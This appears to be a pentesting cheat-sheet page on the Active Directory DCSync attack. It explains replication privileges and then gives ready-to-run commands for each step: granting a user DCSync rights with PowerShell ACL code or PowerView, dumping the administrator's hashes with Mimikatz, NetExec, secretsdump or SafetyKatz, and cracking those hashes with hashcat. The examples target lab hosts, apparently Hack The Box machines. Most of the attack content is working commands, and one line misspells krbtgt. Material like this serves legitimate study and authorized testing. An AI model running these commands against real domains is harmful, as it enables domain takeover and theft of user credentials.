DCSync
In Active Directory environments, multiple Domain Controllers (DCs) replicate data using the Directory Replication Service Remote Protocol (DRSR). The DCSync technique abuses this by impersonating a DC and requesting user credential data—essentially pulling ntds.dit contents over the network without code execution on a real DC. Critically, DCs do not authenticate the source of the replication request, only that the caller’s SID has the necessary replication privileges.
To perform DCSync, an attacker must control an account with the following rights: Replicating Directory Changes, Replicating Directory Changes All, and sometimes Replication-Get-Changes-In-Filtered-Set. These are assigned by default to Domain Admins, Enterprise Admins, and built-in Administrators.
However, if you have WriteDACL over a privileged account, you can delegate these rights yourself. Notably, the Exchange Windows Permissions group often has DCSync rights in enterprise environments. For an example of levearing WriteDACL to perform DCSync see Forest.
Tools
We can enumerate permissions using an elevated CMD or PS session.
# Command Prompt
dsacls "DC=domain,DC=local"
# PowerShell
Get-DomainObjectAcl -Identity <USER> -Domain domain.local -ResolveGUIDsWe can assign DCSync rights manually or automatically using PowerView or DCSync.py.
The manual way is explained here.
# Manually
$acl = get-acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right Ds-Replication-Get-Changes
$objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-acl -aclobject $acl "ad:DC=domain,DC=local"
# PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSyncOnce the rights have been assigned, we can perform the attack with mimikatz.
# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary)
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administratorFinally, we can crack the hash using hashcat on our attacking machine.
hashcat -m 1000 hashes.dcsync rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule --forceWe can assign DCSync rights using DCSync.py.
# DCSync.py
DCSync.py -dc domain.local -t 'CN=<USER>,CN=Users,DC=domain,DC=local' 'domain.local\<USER>:<PASS>'We can also perform the attack with NetExec or Impacket's secretsdump script.
# NetExec
nxc smb 10.10.10.161 -u '<USER>' -p '<PASS>' --ntds --user administrator
# Impacket's secretsdump
impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administratorFor an example of a DCSync attack using
DCSync.pyandsecretsdump.pysee here. For an example of a DCSync attack using NetExec see here.
Finally, we can crack the hash using hashcat on our attacking machine.
hashcat -m 1000 hashes.dcsync rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule --forceSafetyKatz can be used to perform a DCSync attack:
.\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:dcorp\ktbtgt" "exit"Resources
Last updated
Was this helpful?